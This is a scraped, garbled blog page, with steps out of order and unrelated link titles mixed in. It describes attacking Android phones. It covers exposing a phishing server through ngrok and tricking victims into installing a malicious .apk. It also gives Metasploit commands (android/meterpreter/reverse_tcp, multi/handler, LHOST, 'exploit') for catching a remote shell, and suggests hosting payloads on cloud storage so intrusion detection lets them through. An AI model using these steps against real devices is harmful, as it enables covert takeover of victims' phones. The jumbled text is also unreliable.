![]() In this article I will show how to use the ngrok program to expose servers without an external IP address. Many clients of Internet service providers access the Internet through NAT, which means that they cannot make their web server public. This phishing web server must be accessible from the Internet, and this requires a public IP. In real-life scenarios, some social engineering procedures can be utilized to let the objective download the vindictive ‘.apk’ file.Performing social engineering attacks requires a web server on which a site or a page is served that tries to outwit the user and make him enter certain data or perform some action. So, once we execute the ‘ exploit‘ command, the TCP handler starts immediately. Now, we can type ‘exploit’ in order to launch the desired attack. Here, the LPORT is already set, so we just need to set the LHOST to our attacking machine’s IP, and we can do this by the following command: set LHOST 192.168.18.63Ħ. Now, we will use the ‘show options’ command in order to see the configuration, set the LHOST(Local Host) and LPORT(Local Port) values the same as used in the payload (Type the following commands for the same). Set PAYLOAD android/meterpreter/reverse_tcpĤ. ![]() Use multi/handler exploit, set payload the same as generated previously(This will help us to generate a listener). Now, all seems to be set up correctly, and we can start the msfconsole. We, can use this(apache2) web server in order to host files, or we can put on Google Drive or Dropbox or any of the cloud providers who have shared files and then we can put those files on the server, and then the victims will not be able to detect any malicious intent because the Network Intrusion Detection System may bypass and say, Hey! This is a friendly domain we’ll let it go.Ģ. SORT command in Linux/Unix with examples. ![]() ![]() AWK command in Unix/Linux with examples.Sed Command in Linux/Unix with examples.How to Change Root Password in Kali Linux?. ![]() How to Change the username or userID in Kali Linux?.groupadd command in Linux with examples.Linux Virtualization : Linux Containers (lxc).Linux Virtualization : Resource throttling using cgroups.Getting into Android OS remotely using Kali Linux.ISRO CS Syllabus for Scientist/Engineer Exam.ISRO CS Original Papers and Official Keys.GATE CS Original Papers and Official Keys. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
January 2023
Categories |